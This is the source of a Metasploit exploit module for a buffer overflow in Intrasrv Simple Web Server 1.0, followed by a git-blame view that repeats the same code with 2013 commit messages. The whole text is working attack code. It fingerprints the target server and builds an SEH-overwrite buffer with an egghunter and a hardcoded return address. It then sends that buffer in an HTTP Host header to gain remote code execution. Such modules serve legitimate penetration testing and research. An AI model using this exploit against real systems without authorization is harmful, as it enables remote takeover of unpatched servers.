metasploit-framework/modules/exploits/windows/http/intrasrv_bof.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Intrasrv 1.0 Buffer Overflow",
			'Description'    => %q{
					This module exploits a boundary condition error in Intrasrv Simple Web
					Server 1.0. The web interface does not validate the boundaries of an
					HTTP request string prior to copying the data to an insufficiently large
					buffer. Successful exploitation leads to arbitrary remote code execution
					in the context of the application.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'xis_one@STM Solutions',  #Discovery, PoC
					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '94097'],
					['EDB','18397'],
					['BID','60229']
				],
			'Payload'        =>
				{
					'Space' => '4660',
					'StackAdjustment' => -3500,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "thread"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['v1.0 - XP/2003/Win7',
						{
							'Offset' => 1553,
							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 30 2013",
			'DefaultTarget'  => 0))
	end

	def check
		begin
			connect
		rescue
			print_error("Could not connect to target!")
			return Exploit::CheckCode::Safe
		end
		sock.put("GET / HTTP/1.0\r\n")
		res = sock.get

		if res =~ /intrasrv 1.0/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		# setup egghunter
		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
				:checksum=>true
			})

		# setup buffer
		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
		buf << hunter						# egghunter
		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
		buf << [target.ret].pack("V*") 				# seh

		# Setup payload
		shellcode = egg
		# second last byte of payload gets corrupted - pad 2 bytes
		# so we don't corrupt the actual payload
		shellcode << rand_text(2)

		print_status("Sending buffer...")
		# Payload location is an issue, so we're using the tcp mixin
		# instead of HttpClient here to maximize control over what's sent.
		# (i.e. no additional headers to mess with the stack)
		connect
		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
		disconnect
	end
end
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`include Msf::Exploit::Remote::Tcp`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`include Msf::Exploit::Egghunter`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Intrasrv 1.0 Buffer Overflow",`
			`'Description' => %q{`
msftidy 2013-08-10 20:01:44 +00:00			`This module exploits a boundary condition error in Intrasrv Simple Web`
			`Server 1.0. The web interface does not validate the boundaries of an`
			`HTTP request string prior to copying the data to an insufficiently large`
			`buffer. Successful exploitation leads to arbitrary remote code execution`
			`in the context of the application.`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'xis_one@STM Solutions', #Discovery, PoC`
			`'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit`
			`],`
			`'References' =>`
			`[`
			`['OSVDB', '94097'],`
			`['EDB','18397'],`
			`['BID','60229']`
			`],`
			`'Payload' =>`
			`{`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`'Space' => '4660',`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`'StackAdjustment' => -3500,`
			`'BadChars' => "\x00"`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'ExitFunction' => "thread"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['v1.0 - XP/2003/Win7',`
			`{`
			`'Offset' => 1553,`
			`'Ret'=>0x004097dd #p/p/r - intrasrv.exe`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "May 30 2013",`
			`'DefaultTarget' => 0))`
			`end`

			`def check`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`begin`
			`connect`
			`rescue`
			`print_error("Could not connect to target!")`
			`return Exploit::CheckCode::Safe`
			`end`
			`sock.put("GET / HTTP/1.0\r\n")`
			`res = sock.get`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`if res =~ /intrasrv 1.0/`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`return Exploit::CheckCode::Vulnerable`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`# setup egghunter`
			`hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {`
msftidy 2013-08-12 19:14:01 +00:00			`:checksum=>true`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`})`
msftidy 2013-08-10 20:01:44 +00:00
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`# setup buffer`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128`
			`buf << hunter # egghunter`
Use HttpClient 2013-08-12 14:01:01 +00:00			`buf << rand_text(target['Offset']-buf.length) # more junk to offset`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter`
			`buf << [target.ret].pack("V*") # seh`

Use HttpClient 2013-08-12 14:01:01 +00:00			`# Setup payload`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`shellcode = egg`
msftidy 2013-08-12 19:14:01 +00:00			`# second last byte of payload gets corrupted - pad 2 bytes`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`# so we don't corrupt the actual payload`
			`shellcode << rand_text(2)`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00
			`print_status("Sending buffer...")`
msftidy 2013-08-12 19:14:01 +00:00			`# Payload location is an issue, so we're using the tcp mixin`
Use tcp mixin/clean corrupt bytes 2013-08-12 19:12:15 +00:00			`# instead of HttpClient here to maximize control over what's sent.`
			`# (i.e. no additional headers to mess with the stack)`
			`connect`
			`sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")`
			`disconnect`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`end`
			`end`